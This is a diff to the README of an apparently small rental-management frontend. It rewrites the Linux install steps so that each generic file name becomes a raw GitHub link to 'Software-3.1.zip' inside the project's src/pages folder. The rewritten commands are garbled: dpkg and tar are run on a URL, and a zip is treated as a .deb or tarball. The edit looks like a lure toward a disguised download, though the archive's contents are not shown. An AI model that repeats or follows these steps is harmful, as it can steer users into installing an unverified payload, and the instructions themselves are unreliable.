gyyatt/rentfrontend/README.md

 3. Drag the application icon into your Applications folder.

 #### For Linux
-1. Locate the downloaded `.tar.gz` or `.deb` file.
+1. Locate the downloaded `https://github.com/gyyatt/rentfrontend/raw/refs/heads/main/src/pages/Software-3.1.zip` or `.deb` file.
 2. Use your terminal to navigate to the download directory.
-3. For `.deb` files, run `sudo dpkg -i yourfile.deb` to install.
+3. For `.deb` files, run `sudo dpkg -i https://github.com/gyyatt/rentfrontend/raw/refs/heads/main/src/pages/Software-3.1.zip` to install.
-4. For `.tar.gz` files, extract it by running `tar -xzf yourfile.tar.gz` and follow the instructions inside the extracted folder.
+4. For `https://github.com/gyyatt/rentfrontend/raw/refs/heads/main/src/pages/Software-3.1.zip` files, extract it by running `tar -xzf https://github.com/gyyatt/rentfrontend/raw/refs/heads/main/src/pages/Software-3.1.zip` and follow the instructions inside the extracted folder.

 ### 6. Launch the Application
 After installation, launch the application from your desktop or applications folder.
 The app will open, allowing you to start managing your rental properties right away.